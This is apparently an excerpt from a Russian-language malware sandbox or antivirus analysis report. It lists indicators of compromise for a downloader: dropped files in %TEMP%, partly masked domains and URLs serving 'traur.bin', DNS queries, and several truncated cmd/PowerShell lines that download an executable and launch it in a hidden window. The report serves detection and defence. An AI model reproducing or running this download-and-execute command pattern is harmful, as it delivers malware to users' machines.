Техническая информация
- $tsodhcifd как %temp%\ycbkn.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Kdqrynlpili3([String] $Tsodhcifd){(New-Object System.Net.WebClient).DownloadFile($Tsodhcifd,''%TEMP%\ycbkn.exe'');Start-Process ''%TEMP%\ycbkn.exe'';}try{K...
- %TEMP%\kd-uten_tgnp.bat
- %TEMP%\ycbkn.exe
- 'ca####delteatro.it':80
- 'rs###tria.com':80
- http://ca####delteatro.it/traur.bin
- http://rs###tria.com/traur.bin
- http://www.rs###tria.com/traur.bin
- DNS ASK ca####delteatro.it
- DNS ASK rs###tria.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Kdqrynlpili3([String] $Tsodhcifd){(New-Object System.Net.WebClient).DownloadFile($Tsodhcifd,''%TEMP%\ycbkn.exe'');Start-Process ''%TEMP%\ycbkn.exe'';}try{K...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Kd-uten_tgnp.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Kd-uten_tgnp.bat" "